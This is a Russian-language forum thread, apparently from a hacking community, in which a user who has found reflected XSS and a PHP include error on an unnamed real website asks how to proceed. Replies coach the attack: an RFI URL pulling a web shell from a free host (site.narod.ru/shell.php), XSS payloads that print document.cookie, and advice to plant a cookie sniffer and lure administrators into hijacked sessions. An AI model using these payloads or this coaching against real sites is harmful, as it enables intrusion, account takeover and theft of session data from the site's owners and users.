|
Подскажите, что следует делать дальше...
Есть сайт, работает xss
Если написать вот так: http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script> То, как видно из скрипта - вылетает табличка с название сайта. Работет и такое, например.... http://[САЙТ]/?node=tralala Соответственно имеем такое: Warning: main(pages/tralala.php): failed to open stream: No such file or directory in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5 Код:
Warning: main(): Failed opening 'pages/tralala.php' for inclusion (include_path='.:/usr/share/php') in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5Скажите, пожалуйста, что делать дальше? |
поставляй вместо тралала адрес на шел, предварительно тобой залитый на бесплатный хостинг.
|
буит примерно так http://[САЙТ]/?node=http://site.narod.ru/shell.php
Удачи тебе))) |
ну с http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script> это только менять алерт на ссылу со сниффером и пробовать подсовывать админам и т.п. вообщем прилигированным пользователям, и то если там используются куки для авторизации
а с http://[САЙТ]/?node=tralala у тебя ничего не выйдет т.к. ты не сможешь выдти за пределы папки pages |
Спасибо, ребята но с шеллом ничего не вышло... :(
dim_ok Если сдеать вот так: http://[САЙТ]/?node=></td></tr></form></table><script>alert(document.cookie);</script> То мне вылетает такое сообщение PHPSESSID=76a45e1a35900e78ddfb180e83a6b379;_c=y Это что-то дает? Или находу генерирует? |
Делай редирект на страницу и засовывай туда Java script код чтобы угонять куки посмотреть его можно на главной странице античате где идёт надрись"описание снифера".
|
| Время: 08:12 |